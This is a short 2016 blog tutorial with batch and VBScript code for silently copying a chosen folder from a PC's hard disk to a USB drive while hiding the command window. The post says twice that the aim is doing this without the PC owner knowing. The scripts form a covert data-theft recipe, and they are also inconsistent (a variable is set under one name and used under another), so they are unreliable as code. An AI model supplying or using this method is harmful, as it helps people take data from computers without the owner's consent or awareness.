Sunday 17 January 2016

Copy HardDisk data to Removable Disk silently

In This post you will find how you can copy HardDisk Data to your Removable Disk without acquaintance of PC Owner or without copy prompt windows that shows the progress of files. follow bellow steps to achieve this.

Step 1: Firstly you have to create 3 files, named as


"backup_FROM_HDD_to_PD.bat" is a main file that will do this whole process for you, second file "launch.bat" will use to start copy your data from HardDisk to Removable Disk, and the last one "invisible.vbs" this script file will just hide you copy process. All files should be available on your Removable Disk root Directory and all will be parallel to backup_FROM_HDD_to_PD.bat file.
Step 2: Open backup_FROM_HDD_to_PD.bat file and write below code:
        @echo off
        :: variables
        SET odrive=%odrive:~0,2%
        echo off
        echo ——————————-
        echo Removable Device Automatic Backup
        echo ——————————-
        xcopy "D:\SourceFolderName" "%drive%"\DestinationFolderName/Y /E /R /H
        echo Backup Complete!

Step 3: "D:\SourceFolderName" is a path from where you want to copy data to your Removable Disk.

Step 4: In line number 10 after "%drive%" will detect you removable disk from where your launch.bat file will execute
              and after that \DestinationFolderName is a folder name where you want to copy your data.

Step 5: Now your source and destination configration for copy file has been done. you can copy data by executing this
              "backup_FROM_HDD_to_PD.bat" file but this will show you copied file information on you command prompt.

Step 6: As i said in Step 5, backup_FROM_HDD_to_PD.bat is not enough to hide information from command Prompt, you                              need to create "invisible.vbs" file and write bellow code:
        CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Step 7: Now create 3rd file named as launch.bat this will execute your "backup_FROM_HDD_to_PD.bat" and "invisible.vbs", write
              bellow code to "launch.bat" file

        wscript.exe \invisible.vbs backup_FROM_HDD_to_PD.bat

Finally you have done whole configration now time to execute your file "launch.bat", this will copy your HardDisk Data of
defined location in backup_FROM_HDD_to_PD.bat file to defined folder of your Removable Disk, without the PC owner acquaintance.

Have fun!..

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